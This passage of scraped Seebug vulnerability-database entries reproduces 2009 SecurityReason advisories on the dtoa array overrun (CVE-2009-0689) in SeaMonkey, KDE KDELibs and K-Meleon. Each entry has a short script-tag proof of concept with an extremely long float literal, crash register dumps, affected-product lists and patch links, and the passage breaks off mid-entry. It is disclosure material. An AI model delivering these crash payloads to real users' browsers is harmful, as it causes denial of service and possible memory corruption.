-----------------------\r\n&#60;script&#62;\r\nvar a=0.&#60;?php echo str_repeat(&#34;1&#34;,296450); ?&#62;;\r\n&#60;/script&#62;\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = esi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number &#34;CVE-2009-1563&#34;. Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on &#34;CVE-2009-0689&#34;. After some time Mozilla Foundation\r\nSecurity Advisory\r\n(&#34;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&#34;;)\r\nwas updated with note :\r\n&#34;The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)&#34;.\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67075", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:23:01", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "KDE KDELibs 4.3.3 - Remote Array Overrun", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67074", "id": "SSV:67074", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\r\nin dtoa.cpp file\r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don&#39;t checks Kmax limit, and\r\nit is possible to call 16&#60;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n&#60;script&#62;\r\nvar a=0.&#60;?php echo str_repeat(&#34;9&#34;,299999); ?&#62;;\r\n&#60;/script&#62;\r\n- -----------------------\r\n\r\nIf we use konqueror to see this PoC, konqueror will crash. For example\r\n\r\n- -----------------------\r\n&#60;script&#62;\r\nvar a=0.&#60;?php echo str_repeat(&#34;1&#34;,296450); ?&#62;;\r\n&#60;/script&#62;\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 &#60;diff+163&#62;: mov %esi,(%ecx)\r\n\r\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\r\n\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 0x21415c3\r\n\r\nesi=0x71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number &#34;CVE-2009-1563&#34;. Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on &#34;CVE-2009-0689&#34;. After some time Mozilla Foundation\r\nSecurity Advisory\r\n(&#34;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&#34;;)\r\nwas updated with note :\r\n&#34;The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)&#34;.\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\r\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\r\n=jTmp\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67074", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:05", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "K-Meleon 1.5.3 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18282", "id": "SSV:18282", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser\r\nbased on the Gecko layout engine developed by Mozilla which is also used\r\nby Firefox. K-Meleon is free, open source software released under the\r\nGNU General Public License and is designed specifically for Microsoft\r\nWindows (Win32) operating systems.\r\n\r\n\r\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. K-Meleon has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16&lt;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;1&quot;,296450); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\r\nviolation reading location 0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx]\r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on &quot;CVE-2009-0689&quot;. After some time Mozilla Foundation\r\nSecurity Advisory\r\n(&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;;)\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)&quot;.\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\r\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\r\n=Zqoe\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18282", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:05", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "SeaMonkey 1.1.8 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18281", "id": "SSV:18281", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: 